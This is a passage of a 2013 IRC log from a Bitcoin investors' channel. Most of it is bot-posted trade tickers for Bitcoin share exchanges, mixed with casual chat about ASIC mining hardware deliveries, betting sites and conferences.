2.68999 BTC [+] Jun 01 16:33:01 [HAVELOCK] [HIM] 2 @ 2.6901 = 5.3802 BTC [+] Jun 01 16:33:07 [HAVELOCK] [HIM] 8 @ 2.699 = 21.592 BTC [+] Jun 01 16:33:24 [HAVELOCK] [HIM] 1 @ 2.7 BTC [+] Jun 01 16:33:26 [HAVELOCK] [HIM] 5 @ 2.7 = 13.5 BTC [+] Jun 01 16:33:38 [HAVELOCK] [HIM] 2 @ 2.73 = 5.46 BTC [+] Jun 01 16:36:45 this is kinda neat https://www.proofofexistence.com/ Jun 01 16:42:54 Secure connection: fatal error (552) Jun 01 16:43:08 [BTCTC] [PAJKA.BOND] 1 @ 0.11 BTC [+] Jun 01 16:43:11 ppls and https. a saga. Jun 01 16:43:49 Bit of a nail-biter: http://bitbet.us/bet/454/btc-network-difficulty-tops-25-million-by-end/ Jun 01 16:44:13 http://www.edithsherwood.com/voynich_decoded/index.php Jun 01 16:44:16 this is pretty cool! Jun 01 16:46:08 [HAVELOCK] [VTX] 2 @ 0.425 = 0.85 BTC [+] Jun 01 16:47:54 [BTCTC] [COGNITIVE] 8 @ 0.31 = 2.48 BTC [-] Jun 01 16:48:26 [BTCTC] [BASIC-MINING] 3 @ 0.68 = 2.04 BTC [+] Jun 01 16:49:10 [BTCTC] [TAT.ASICMINER] 17 @ 0.0249 = 0.4233 BTC [+] Jun 01 16:50:56 mircea_popescu: Probably makes a lot more sense if you speak / read Italian. :( Jun 01 16:52:59 [HAVELOCK] [ASICM] 2 @ 0.02489 = 0.0498 BTC [+] Jun 01 16:53:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.0249 = 0.0498 BTC [+] Jun 01 16:53:34 mircea_popescu: http://ablersite.files.wordpress.com/2010/05/hearing-aids-for-hipsters-11.jpg?w=610 Jun 01 16:59:35 lol Jun 01 17:03:18 [MPEX] [S.MPOE] 15244 @ 0.00072135 = 10.9963 BTC [+] Jun 01 17:03:20 [MPEX] [S.MPOE] 3763 @ 0.0007222 = 2.7176 BTC [+] Jun 01 17:07:20 Neil i guess so. Jun 01 17:07:33 jurov ahaha great. Jun 01 17:07:36 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [-] Jun 01 17:07:44 [BTCTC] [BITVPS] 51 @ 0.00072 = 0.0367 BTC [+] Jun 01 17:08:00 [BTCTC] [BASIC-MINING] 2 @ 0.68 = 1.36 BTC [+] Jun 01 17:10:30 [BTCTC] [S.MPOE-PT] 12 @ 0.000665 = 0.008 BTC [-] Jun 01 17:13:14 [HAVELOCK] [ASICM] 11 @ 0.0248 = 0.2728 BTC [-] Jun 01 17:21:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [+] Jun 01 17:23:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [+] Jun 01 17:27:09 [HAVELOCK] [ASICM] 8 @ 0.02479 = 0.1983 BTC [-] Jun 01 17:31:08 [BTCTC] [ASICMINER-PT] 16 @ 2.48 = 39.68 BTC [+] Jun 01 17:32:53 [BTCTC] [ASICMINER-PT] 3 @ 2.48 = 7.44 BTC [+] Jun 01 17:42:08 [BTCTC] [PAJKA.BOND] 1 @ 0.08 BTC [-] Jun 01 17:45:48 [HAVELOCK] [ASICM] 10 @ 0.02479 = 0.2479 BTC [-] Jun 01 17:50:36 [HAVELOCK] [ASICM] 4 @ 0.02479 = 0.0992 BTC [-] Jun 01 17:52:12 [BTCTC] [PAJKA.BOND] 1 @ 0.11 BTC [+] Jun 01 17:57:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [-] Jun 01 17:58:09 If my estimations are correct, people have ordered 158TH of chips from Avalon already Jun 01 17:59:08 1-200 th yea Jun 01 17:59:39 [BTCTC] [PAJKA.BOND] 1 @ 0.08 BTC [-] Jun 01 18:01:35 [BTCTC] [PAJKA.BOND] 9 @ 0.08 = 0.72 BTC [-] Jun 01 18:02:09 About 43,736btc Jun 01 18:02:11 lol Jun 01 18:02:21 not bad Jun 01 18:04:45 [BTCTC] [PAJKA.BOND] 4 @ 0.08 = 0.32 BTC [-] Jun 01 18:05:01 [BTCTC] [BTC-BOND] 5 @ 0.01 = 0.05 BTC [+] Jun 01 18:05:58 [BTCTC] [ASICMINER-PT] 3 @ 2.48 = 7.44 BTC [+] Jun 01 18:07:47 their wallet actually has 63,278.8 BTC sitting in it Jun 01 18:07:54 [BTCTC] [TAT.ASICMINER] 27 @ 0.0248 = 0.6696 BTC [-] Jun 01 18:08:28 should be fun when they have to cash out to pay for these chips Jun 01 18:10:07 [BTCTC] [ASICMINER-PT] 11 @ 2.48 = 27.28 BTC [+] Jun 01 18:12:05 ThickAsThieves: and about 200th from asicminer Jun 01 18:14:15 [HAVELOCK] [ASICM] 10 @ 0.02479 = 0.2479 BTC [-] Jun 01 18:14:32 interesting, BFL set up an irc chatroom Jun 01 18:14:55 #butterflylabs Jun 01 18:17:30 they have delivery staff in there Jun 01 18:18:04 ThickAsThieves: and about 200th from asicminer <<<< is it a known fact that AM ordered their chips from Avalon, or was it the same fab, or? Jun 01 18:18:48 er, wtf? Jun 01 18:18:53 no, AM used a different fab. Jun 01 18:19:04 [BTCTC] [BITVPS] 19 @ 0.000722 = 0.0137 BTC [+] Jun 01 18:19:23 its just that if bfl ships, which it probably wont, we're looking at 500TH by this time next year. Jun 01 18:19:58 surely sooner than that Jun 01 18:20:12 thats the outside. Jun 01 18:20:22 the inside could be the next 4 months. Jun 01 18:25:08 [MPEX] [S.MPOE] 3418 @ 0.0007222 = 2.4685 BTC [+] Jun 01 18:32:57 [BTCTC] [PAJKA.BOND] 3 @ 0.109501 = 0.3285 BTC [+] Jun 01 18:33:40 [BTCTC] [GSDPT] 8 @ 0.002895 = 0.0232 BTC [+] Jun 01 18:33:42 [BTCTC] [PAJKA.BOND] 9 @ 0.1095 = 0.9855 BTC [-] Jun 01 18:34:42 [BTCTC] [GSDPT] 140 @ 0.002895 = 0.4053 BTC [+] Jun 01 18:35:24 [BTCTC] [GSDPT] 8 @ 0.002899 = 0.0232 BTC [+] Jun 01 18:36:45 [HAVELOCK] [ASICM] 100 @ 0.0246 = 2.46 BTC [-] Jun 01 18:36:46 [HAVELOCK] [ASICM] 11 @ 0.02455 = 0.2701 BTC [-] Jun 01 18:36:48 [HAVELOCK] [ASICM] 38 @ 0.0245211 = 0.9318 BTC [-] Jun 01 18:36:49 [HAVELOCK] [ASICM] 42 @ 0.0245101 = 1.0294 BTC [-] Jun 01 18:36:50 [HAVELOCK] [ASICM] 21 @ 0.02450001 = 0.5145 BTC [-] Jun 01 18:36:51 [HAVELOCK] [ASICM] 9 @ 0.0245 = 0.2205 BTC [-] Jun 01 18:36:52 [HAVELOCK] [ASICM] 29 @ 0.02425 = 0.7033 BTC [-] Jun 01 18:38:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0247 BTC [-] Jun 01 18:38:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.0247 = 0.0494 BTC [-] Jun 01 18:38:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.0247 = 0.0741 BTC [-] Jun 01 18:38:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.02465 = 0.0493 BTC [-] Jun 01 18:38:22 [BTCTC] [S.DICE-PT] 4 @ 0.002724 = 0.0109 BTC [-] Jun 01 18:38:23 [BTCTC] [TAT.ASICMINER] 9 @ 0.02465 = 0.2219 BTC [-] Jun 01 18:38:25 [BTCTC] [TAT.ASICMINER] 19 @ 0.02463 = 0.468 BTC [-] Jun 01 18:38:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.02462 = 0.2462 BTC [-] Jun 01 18:38:28 [BTCTC] [TAT.ASICMINER] 44 @ 0.02461 = 1.0828 BTC [-] Jun 01 18:38:29 [BTCTC] [TAT.ASICMINER] 46 @ 0.024602 = 1.1317 BTC [-] Jun 01 18:38:33 [BTCTC] [TAT.ASICMINER] 18 @ 0.0246 = 0.4428 BTC [-] Jun 01 18:38:37 [BTCTC] [TAT.ASICMINER] 19 @ 0.02457 = 0.4668 BTC [-] Jun 01 18:38:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.024564 = 0.0491 BTC [-] Jun 01 18:38:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.024563 = 0.0737 BTC [-] Jun 01 18:38:47 [BTCTC] [TAT.ASICMINER] 29 @ 0.024561 = 0.7123 BTC [-] Jun 01 18:38:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.02451 = 0.049 BTC [-] Jun 01 18:38:55 [BTCTC] [TAT.ASICMINER] 44 @ 0.024501 = 1.078 BTC [-] Jun 01 18:38:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.0245 = 0.049 BTC [-] Jun 01 18:39:37 [HAVELOCK] [ASICM] 18 @ 0.02425 = 0.4365 BTC [-] Jun 01 18:39:38 [HAVELOCK] [ASICM] 1 @ 0.02425 BTC [-] Jun 01 18:42:20 [BTCTC] [ASICMINER-PT] 2 @ 2.48 = 4.96 BTC [+] Jun 01 18:48:50 [BTCTC] [ASICMINER-PT] 7 @ 2.48 = 17.36 BTC [+] Jun 01 18:54:25 [MPEX] [S.DICE] [PAID] 0.000001 BTC to 50`000`000 shares, 0 satoshi per share Jun 01 18:56:55 [BTCTC] [S.DICE-PT] 46 @ 0.002724 = 0.1253 BTC [-] Jun 01 19:00:53 [HAVELOCK] [ASICM] 15 @ 0.02425 = 0.3638 BTC [-] Jun 01 19:01:22 [BTCTC] [BASIC-MINING] 4 @ 0.68 = 2.72 BTC [+] Jun 01 19:05:17 [HAVELOCK] [ASICM] 91 @ 0.02425 = 2.2068 BTC [-] Jun 01 19:06:28 [BTCTC] [BASIC-MINING] 2 @ 0.68 = 1.36 BTC [+] Jun 01 19:07:58 !fml Jun 01 19:16:11 [BTCTC] [BASIC-MINING] 7 @ 0.68 = 4.76 BTC [+] Jun 01 19:21:00 so I wonder if KnC is real Jun 01 19:22:18 [BTCTC] [ASICMINER-PT] 1 @ 2.472 BTC [-] Jun 01 19:22:20 [BTCTC] [ASICMINER-PT] 1 @ 2.472 BTC [-] Jun 01 19:22:24 [BTCTC] [ASICMINER-PT] 12 @ 2.47 = 29.64 BTC [-] Jun 01 19:22:25 [BTCTC] [ASICMINER-PT] 3 @ 2.47 = 7.41 BTC [-] Jun 01 19:22:28 [BTCTC] [ASICMINER-PT] 6 @ 2.465 = 14.79 BTC [-] Jun 01 19:22:31 [BTCTC] [ASICMINER-PT] 5 @ 2.465 = 12.325 BTC [-] Jun 01 19:22:33 [BTCTC] [BASIC-MINING] 1 @ 0.69 BTC [+] Jun 01 19:22:44 ;;seen davout Jun 01 19:22:44 davout was last seen in #bitcoin-assets 1 week, 1 day, 2 hours, 15 minutes, and 25 seconds ago: at current rates i can live comfortably a couple of years on my savings, but in my definition being filthy rich is like "i'll never work ever again, hmmm, which maserati should i get" Jun 01 19:27:00 [BTCTC] [S.DICE-PT] 65 @ 0.002725 = 0.1771 BTC [+] Jun 01 19:30:21 [BTCTC] [TAT.ASICMINER] 19 @ 0.02479 = 0.471 BTC [+] Jun 01 19:30:32 [BTCTC] [TAT.ASICMINER] 41 @ 0.0248 = 1.0168 BTC [+] Jun 01 19:34:25 [BTCTC] [GOLD] 1 @ 0.1024 BTC [+] Jun 01 19:35:50 [BTCTC] [COGNITIVE] 2 @ 0.300112 = 0.6002 BTC [-] Jun 01 19:36:59 [BTCTC] [ESECURITYSABTC] 5 @ 0.27 = 1.35 BTC [-] Jun 01 19:42:43 [HAVELOCK] [ASICM] 2 @ 0.024241 = 0.0485 BTC [-] Jun 01 19:42:44 [HAVELOCK] [ASICM] 27 @ 0.02424 = 0.6545 BTC [-] Jun 01 19:43:45 [HAVELOCK] [ASICM] 51 @ 0.02424 = 1.2362 BTC [-] Jun 01 19:44:47 [BTCTC] [TAT.ASICMINER] 20 @ 0.024565 = 0.4913 BTC [-] Jun 01 19:44:49 [BTCTC] [TAT.ASICMINER] 40 @ 0.024564 = 0.9826 BTC [-] Jun 01 19:44:50 [BTCTC] [TAT.ASICMINER] 43 @ 0.024425 = 1.0503 BTC [-] Jun 01 19:44:52 [BTCTC] [TAT.ASICMINER] 33 @ 0.02442 = 0.8059 BTC [-] Jun 01 19:44:53 [BTCTC] [TAT.ASICMINER] 12 @ 0.02441 = 0.2929 BTC [-] Jun 01 19:44:54 [BTCTC] [TAT.ASICMINER] 100 @ 0.0244 = 2.44 BTC [-] Jun 01 19:44:56 [BTCTC] [TAT.ASICMINER] 30 @ 0.0244 = 0.732 BTC [-] Jun 01 19:44:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.0244 = 0.0488 BTC [-] Jun 01 19:45:17 [BTCTC] [PAJKA.BOND] 2 @ 0.11 = 0.22 BTC [+] Jun 01 19:47:36 [HAVELOCK] [ASICM] 20 @ 0.02424 = 0.4848 BTC [-] Jun 01 19:50:33 [HAVELOCK] [ASICM] 90 @ 0.02424 = 2.1816 BTC [-] Jun 01 19:50:41 [BTCTC] [S.DICE-PT] 1 @ 0.00273 BTC [+] Jun 01 19:52:45 [BTCTC] [S.DICE-PT] 1 @ 0.00273 BTC [+] Jun 01 19:53:27 [BTCTC] [S.DICE-PT] 38 @ 0.00273 = 0.1037 BTC [+] Jun 01 19:53:29 [BTCTC] [S.DICE-PT] 62 @ 0.002733 = 0.1694 BTC [+] Jun 01 19:53:42 [BTCTC] [TAT.ASICMINER] 4 @ 0.024799 = 0.0992 BTC [+] Jun 01 19:54:23 [BTCTC] [S.DICE-PT] 98 @ 0.002733 = 0.2678 BTC [+] Jun 01 19:57:49 so, coinbr received 2 satoshi from s.dice. any idea how to fairly split it? Jun 01 19:57:54 "D Jun 01 19:59:46 2 satoshis for azelphur, nothing for anyone else Jun 01 20:00:45 jurov: add it to next months divs? Jun 01 20:02:57 heh Jun 01 20:04:54 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [-] Jun 01 20:04:58 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [-] Jun 01 20:06:08 keep it Jun 01 20:06:57 [BTCTC] [ASICMINER-PT] 1 @ 2.472 BTC [+] Jun 01 20:06:59 [BTCTC] [ASICMINER-PT] 1 @ 2.473 BTC [+] Jun 01 20:12:50 [BTCTC] [BTC-BOND] 1 @ 0.009998 BTC [-] Jun 01 20:12:53 [BTCTC] [BTC-BOND] 1 @ 0.009997 BTC [-] Jun 01 20:12:54 [BTCTC] [BTC-BOND] 1 @ 0.00978 BTC [-] Jun 01 20:12:56 [BTCTC] [BTC-BOND] 20 @ 0.00978 = 0.1956 BTC [-] Jun 01 20:13:00 [BTCTC] [BTC-BOND] 30 @ 0.00977 = 0.2931 BTC [-] Jun 01 20:13:02 [BTCTC] [BTC-BOND] 10 @ 0.009767 = 0.0977 BTC [-] Jun 01 20:13:04 [BTCTC] [BTC-BOND] 95 @ 0.00976 = 0.9272 BTC [-] Jun 01 20:13:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.024798 = 0.0496 BTC [-] Jun 01 20:14:38 [BTCTC] [TAT.ASICMINER] 20 @ 0.024798 = 0.496 BTC [-] Jun 01 20:15:40 [BTCTC] [TAT.ASICMINER] 20 @ 0.024416 = 0.4883 BTC [-] Jun 01 20:15:42 [BTCTC] [TAT.ASICMINER] 44 @ 0.024415 = 1.0743 BTC [-] Jun 01 20:15:44 [BTCTC] [TAT.ASICMINER] 4 @ 0.024372 = 0.0975 BTC [-] Jun 01 20:15:46 [BTCTC] [TAT.ASICMINER] 51 @ 0.02437 = 1.2429 BTC [-] Jun 01 20:15:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.02436 BTC [-] Jun 01 20:15:52 [BTCTC] [ASICMINER-PT] 1 @ 2.473 BTC [+] Jun 01 20:17:30 lol totally keep it. Jun 01 20:18:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.02436 = 0.0487 BTC [-] Jun 01 20:18:24 [BTCTC] [TAT.ASICMINER] 58 @ 0.024798 = 1.4383 BTC [+] Jun 01 20:18:47 ;;ticker Jun 01 20:18:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.024241 BTC [-] Jun 01 20:19:09 BTCUSD ticker | Best bid: 128.09820, Best ask: 128.09825, Bid-ask spread: 0.00005, Last trade: 128.05000, 24 hour volume: 13621.42022306, 24 hour low: 126.33000, 24 hour high: 130.00000, 24 hour vwap: 128.02059 Jun 01 20:19:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.024798 BTC [+] Jun 01 20:19:15 [BTCTC] [TAT.ASICMINER] 19 @ 0.024241 = 0.4606 BTC [-] Jun 01 20:20:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.02423 = 0.1212 BTC [-] Jun 01 20:21:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.024211 BTC [-] Jun 01 20:21:55 [BTCTC] [TAT.ASICMINER] 9 @ 0.02412 = 0.2171 BTC [-] Jun 01 20:21:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.024111 = 0.0482 BTC [-] Jun 01 20:21:59 [BTCTC] [TAT.ASICMINER] 7 @ 0.024111 = 0.1688 BTC [-] Jun 01 20:22:02 [BTCTC] [TAT.ASICMINER] 58 @ 0.0241 = 1.3978 BTC [-] Jun 01 20:22:18 heya Jun 01 20:22:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0241 BTC [-] Jun 01 20:22:38 [BTCTC] [ASICMINER-PT] 1 @ 2.473 BTC [+] Jun 01 20:25:19 [BTCTC] [ASICMINER-PT] 1 @ 2.473 BTC [+] Jun 01 20:27:24 [BTCTC] [ASICMINER-PT] 1 @ 2.473 BTC [+] Jun 01 20:28:25 [BTCTC] [ASICMINER-PT] 15 @ 2.47 = 37.05 BTC [-] Jun 01 20:28:30 anyone have any stance on the bitfury bet? is it confirmed that it is in fact they that made this bet? any details provided to the admins on the terms of resolution? Jun 01 20:28:56 anything you can really know for sure Jun 01 20:29:01 is in the best itself Jun 01 20:29:02 pretty neat marketing trick, for sure Jun 01 20:29:33 yeah I already placed a bit based on that, nothing I can't afford to lose Jun 01 20:30:19 mircea_popescu , withdraw process .thanks Jun 01 20:30:28 but it's a weird one, as we know bitbet does not want to get the same pr problem als betsofbitcoin due to bfl bs Jun 01 20:30:37 damientrog it's confirmed Jun 01 20:30:41 nice Jun 01 20:30:53 [BTCTC] [S.DICE-PT] 47 @ 0.002725 = 0.1281 BTC [-] Jun 01 20:30:54 jborkl_ i'm doing it with today's bundle. Jun 01 20:31:05 [BTCTC] [S.DICE-PT] 100 @ 0.0026 = 0.26 BTC [-] Jun 01 20:36:30 ah, thank you Jun 01 20:49:35 [MPEX] [S.MPOE] 4321 @ 0.00072126 = 3.1166 BTC [-] Jun 01 20:49:39 [MPEX] [S.MPOE] 3210 @ 0.00072103 = 2.3145 BTC [-] Jun 01 21:02:04 [HAVELOCK] [ASICM] 20 @ 0.024785 = 0.4957 BTC [+] Jun 01 21:16:30 [BTCTC] [TAT.ASICMINER] 20 @ 0.024797 = 0.4959 BTC [+] Jun 01 21:16:38 [BTCTC] [ASICMINER-PT] 1 @ 2.473 BTC [+] Jun 01 21:18:49 [BTCTC] [TAT.ASICMINER] 8 @ 0.024798 = 0.1984 BTC [+] Jun 01 21:20:35 [BTCTC] [TAT.ASICMINER] 32 @ 0.024798 = 0.7935 BTC [+] Jun 01 21:21:39 [BTCTC] [TAT.ASICMINER] 8 @ 0.024799 = 0.1984 BTC [+] Jun 01 21:22:01 [BTCTC] [TAT.ASICMINER] 20 @ 0.024797 = 0.4959 BTC [-] Jun 01 21:22:44 [HAVELOCK] [ASICM] 20 @ 0.02424 = 0.4848 BTC [-] Jun 01 21:22:45 [HAVELOCK] [ASICM] 44 @ 0.02423001 = 1.0661 BTC [-] Jun 01 21:22:46 [HAVELOCK] [ASICM] 36 @ 0.02423 = 0.8723 BTC [-] Jun 01 21:24:27 [BTCTC] [TAT.ASICMINER] 6 @ 0.024202 = 0.1452 BTC [-] Jun 01 21:24:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.024201 = 0.484 BTC [-] Jun 01 21:24:33 [BTCTC] [TAT.ASICMINER] 2 @ 0.0242 = 0.0484 BTC [-] Jun 01 21:24:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.02412 = 0.1206 BTC [-] Jun 01 21:24:44 [BTCTC] [TAT.ASICMINER] 45 @ 0.02411 = 1.085 BTC [-] Jun 01 21:24:45 [BTCTC] [TAT.ASICMINER] 44 @ 0.024101 = 1.0604 BTC [-] Jun 01 21:24:48 [BTCTC] [TAT.ASICMINER] 41 @ 0.0241 = 0.9881 BTC [-] Jun 01 21:24:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.0241 = 0.0482 BTC [-] Jun 01 21:25:03 [HAVELOCK] [ASICM] 5 @ 0.02423 = 0.1212 BTC [-] Jun 01 21:25:05 [HAVELOCK] [ASICM] 45 @ 0.02423 = 1.0904 BTC [-] Jun 01 21:25:05 [HAVELOCK] [ASICM] 49 @ 0.024225 = 1.187 BTC [-] Jun 01 21:25:06 [HAVELOCK] [ASICM] 1 @ 0.024222 BTC [-] Jun 01 21:25:47 [HAVELOCK] [ASICM] 4 @ 0.024222 = 0.0969 BTC [-] Jun 01 21:25:47 [HAVELOCK] [ASICM] 1 @ 0.02422 BTC [-] Jun 01 21:25:47 [HAVELOCK] [ASICM] 1 @ 0.02422 BTC [-] Jun 01 21:25:49 [HAVELOCK] [ASICM] 1 @ 0.02422 BTC [-] Jun 01 21:25:50 [HAVELOCK] [ASICM] 3 @ 0.0242 = 0.0726 BTC [-] Jun 01 21:25:51 [HAVELOCK] [ASICM] 1 @ 0.0242 BTC [-] Jun 01 21:25:52 [HAVELOCK] [ASICM] 46 @ 0.0242 = 1.1132 BTC [-] Jun 01 21:25:53 [HAVELOCK] [ASICM] 542 @ 0.0242 = 13.1164 BTC [-] Jun 01 21:25:54 [HAVELOCK] [ASICM] 100 @ 0.02415001 = 2.415 BTC [-] Jun 01 21:25:54 [HAVELOCK] [ASICM] 1 @ 0.02411 BTC [-] Jun 01 21:26:31 [BTCTC] [ASICMINER-PT] 1 @ 2.465 BTC [-] Jun 01 21:26:37 [BTCTC] [ASICMINER-PT] 2 @ 2.46 = 4.92 BTC [-] Jun 01 21:26:39 [BTCTC] [ASICMINER-PT] 1 @ 2.456 BTC [-] Jun 01 21:37:19 [BTCTC] [COGNITIVE] 1 @ 0.300113 BTC [+] Jun 01 21:37:20 [BTCTC] [COGNITIVE] 2 @ 0.300112 = 0.6002 BTC [-] Jun 01 21:37:22 [BTCTC] [COGNITIVE] 2 @ 0.3001 = 0.6002 BTC [-] Jun 01 21:39:54 [BTCTC] [PAJKA.BOND] 7 @ 0.1084 = 0.7588 BTC [-] Jun 01 21:40:50 [BTCTC] [PAJKA.BOND] 20 @ 0.08 = 1.6 BTC [-] Jun 01 21:41:58 [BTCTC] [COGNITIVE] 1 @ 0.3001 BTC [-] Jun 01 21:43:25 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199 BTC [-] Jun 01 21:47:09 [BTCTC] [PAJKA.BOND] 10 @ 0.08 = 0.8 BTC [-] Jun 01 21:57:51 [HAVELOCK] [ASICM] 38 @ 0.0245999 = 0.9348 BTC [+] Jun 01 22:01:35 [BTCTC] [BASIC-MINING] 3 @ 0.69 = 2.07 BTC [+] Jun 01 22:03:49 [BTCTC] [TAT.ASICMINER] 7 @ 0.024788 = 0.1735 BTC [+] Jun 01 22:03:51 [BTCTC] [TAT.ASICMINER] 36 @ 0.024789 = 0.8924 BTC [+] Jun 01 22:04:16 [BTCTC] [S.DICE-PT] 55 @ 0.00259 = 0.1425 BTC [-] Jun 01 22:15:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.02479 BTC [+] Jun 01 22:18:29 [HAVELOCK] [ASICM] 54 @ 0.02469 = 1.3333 BTC [+] Jun 01 22:19:29 [BTCTC] [TAT.ASICMINER] 31 @ 0.02479 = 0.7685 BTC [+] Jun 01 22:32:12 [BTCTC] [ASICMINER-PT] 4 @ 2.473 = 9.892 BTC [+] Jun 01 22:32:42 [BTCTC] [ASICMINER-PT] 1 @ 2.474 BTC [+] Jun 01 22:32:44 [BTCTC] [ASICMINER-PT] 1 @ 2.474 BTC [+] Jun 01 22:37:21 ;;bc,stats Jun 01 22:37:22 Current Blocks: 239124 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 779 blocks | Next Difficulty In About: 3 days, 20 hours, 5 minutes, and 54 seconds | Next Difficulty Estimate: 14654655.6648 | Estimated Percent Change: 20.58059 Jun 01 22:46:41 [BTCTC] [TAT.ASICMINER] 12 @ 0.02479 = 0.2975 BTC [+] Jun 01 22:49:18 [BTCTC] [BASIC-MINING] 8 @ 0.69 = 5.52 BTC [+] Jun 01 23:08:41 [BTCTC] [PAJKA.BOND] 1 @ 0.08 BTC [-] Jun 01 23:10:37 [HAVELOCK] [HIM] 1 @ 2.73 BTC [+] Jun 01 23:14:20 [BTCTC] [TAT.ASICMINER] 6 @ 0.024799 = 0.1488 BTC [+] Jun 01 23:14:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.024799 BTC [+] Jun 01 23:15:42 http://www.coindesk.com/bitcoin-conference-comes-to-london/ Jun 01 23:16:09 lmao these idiots. nefario's scamconference was london's first "big conference". Jun 01 23:16:36 it's cute they're copying my april event but seriously... announced today for two weeks away ? what's this, supernoding ? Jun 01 23:17:40 again someone fears he'll be left behind Jun 01 23:18:23 did you even announce it anywhere beside teh blog? Jun 01 23:18:40 im sure most of ppl dont know its even happenin Jun 01 23:19:16 i mean im not saying you should do it Jun 01 23:19:19 lol Jun 01 23:19:22 but hey, the result is expected Jun 01 23:19:38 kakobrekla you'll have to gimme more context. Jun 01 23:20:23 well these conferences are talked about on every fuckin noob chan and yours isnt Jun 01 23:20:28 [BTCTC] [BTC-BOND] 20 @ 0.009999 = 0.2 BTC [+] Jun 01 23:20:38 but mine is a year away Jun 01 23:20:40 so ppl dont know about it Jun 01 23:20:49 and prolly never will? Jun 01 23:20:51 or you mean the prev edition ? Jun 01 23:21:06 but its not the intention to bring hoards of newbs there or is it Jun 01 23:21:11 no the next one Jun 01 23:21:11 not rly. Jun 01 23:21:20 i mean, some intelligent noobs are welcome Jun 01 23:21:32 but you know... Jun 01 23:21:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.024799 BTC [+] Jun 01 23:22:07 [BTCTC] [ASICMINER-PT] 2 @ 2.474 = 4.948 BTC [+] Jun 01 23:22:38 [HAVELOCK] [VTX] 1 @ 0.425 BTC [+] Jun 01 23:23:56 [HAVELOCK] [SDICE] 1 @ 0.22311 BTC [+] Jun 01 23:25:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [+] Jun 01 23:26:00 [MPEX] [S.MPOE] [PAID] 1,463.87611304 BTC to 500`000`000 shares, 292 satoshi per share Jun 01 23:27:24 [HAVELOCK] [ASICM] 26 @ 0.02469 = 0.6419 BTC [+] Jun 01 23:28:53 [HAVELOCK] [ASICM] 16 @ 0.02469 = 0.395 BTC [+] Jun 01 23:30:48 also ontopic, http://girls.twistys.com/preview/totm/06-2013/p05/image/15.jpg Jun 01 23:31:10 lol when i first read mpoe report, miscalculated the dividend as 4% and was like \o/ Jun 01 23:31:18 but then i checked that :) Jun 01 23:31:40 it's ~ 0.4% , still very nice Jun 01 23:31:52 4% per month is a little much :p Jun 01 23:33:08 The Economist reports that Utah is believed to have the highest per-capita rate of affinity fraud in the U.S. due to about two-thirds of the state's residents being members of the LDS Church. Authorities estimate affinity fraud cost Utahans an estimated $1.4 billion in 2010 alone, an average of about $500 per resident Jun 01 23:33:21 that's pretty funny. more than somalia average salary :D Jun 01 23:33:29 [BTCTC] [BITVPS] 2 @ 0.000721 = 0.0014 BTC [-] Jun 01 23:33:42 mormons Jun 01 23:33:47 funniest religion of the bunch Jun 01 23:33:52 morons. extra m. Jun 01 23:37:16 Goddard recanted his earlier assertions about the moron: "It may still be objected that moron parents are likely to have imbecile or idiot children. There is not much evidence that this is the case. The danger is probably negligible." Jun 01 23:40:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.0248 = 0.0744 BTC [+] Jun 01 23:43:25 [BTCTC] [BITVPS] 7 @ 0.000721 = 0.005 BTC [-] Jun 01 23:44:01 [BTCTC] [TAT.ASICMINER] 39 @ 0.0248 = 0.9672 BTC [+] Jun 01 23:47:49 utah also searches for the most porn out of any state Jun 01 23:47:53 or buys the most porn Jun 01 23:47:59 on the web Jun 01 23:48:10 and its illegal there Jun 01 23:48:40 well that explains it Jun 01 23:48:57 so if bitcoin becomes 'illegal' in the states im not going to worry Jun 01 23:50:47 [BTCTC] [BITVPS] 1 @ 0.000721 BTC [-] Jun 02 00:12:10 so.. BFL has shipped Jun 02 00:12:17 [HAVELOCK] [ASICM] 1 @ 0.02469 BTC [+] Jun 02 00:12:43 where is your god now Jun 02 00:13:06 they shipped like 3 days worth of orders Jun 02 00:13:09 right? Jun 02 00:14:32 at this rate, they will deliver everything at some point after the reward halves Jun 02 00:15:52 fiat500 lol what have they shipped ? Jun 02 00:16:20 looking at the order tracker it looks like 8 days worth of hardware Jun 02 00:16:23 http://bfl.ptz.ro/ Jun 02 00:16:36 only jalapenos and minis Jun 02 00:17:03 actually just halapenos Jun 02 00:17:09 jalapenos, whatever Jun 02 00:21:25 haha, gigavps has 4 minirigs up there, basically a $100k loan to BFL for a year Jun 02 00:21:28 ouch Jun 02 00:21:30 interest-free Jun 02 00:22:05 well gigaminers have that Jun 02 00:26:31 oh my oh my 15.jpg is a nice pic Jun 02 00:27:58 hi evoorhees, why these nick maneuvers? Jun 02 00:29:24 fiat500 not really. if he paid in BTC it's a lot cuter. Jun 02 00:29:59 